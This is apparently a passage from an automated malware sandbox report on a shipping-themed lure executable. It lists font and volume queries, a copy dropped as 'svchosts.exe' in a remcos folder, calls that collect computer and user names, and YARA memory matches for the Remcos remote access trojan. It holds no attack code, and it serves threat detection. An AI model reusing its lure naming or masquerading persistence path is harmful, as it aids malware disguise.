          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe | Queries volume information: C:\Users\user\AppData\Roaming\remcos\svchosts.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe | Queries volume information: C:\Users\user\AppData\Roaming\remcos\svchosts.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe | Queries volume information: C:\Users\user\AppData\Roaming\remcos\svchosts.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Code function: 17_2_00402832 Sleep,GetLocalTime,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,printf,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ | 17_2_00402832
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Code function: 17_2_0040E549 GetComputerNameExW,GetUserNameW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ | 17_2_0040E549
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected Remcos RAT
          Source: Yara match | File source: 00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000016.00000002.388465248.0000000003024000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000017.00000002.409864632.000000000404F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000019.00000002.421492633.0000000002A84000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000016.00000002.392156248.00000000041AF000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000021.00000002.403933269.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000017.00000002.407164584.0000000002EC4000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000019.00000002.424438341.0000000003C0F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000001F.00000002.471564626.0000000000400000.00000040.00000001.sdmp, type: MEMORY
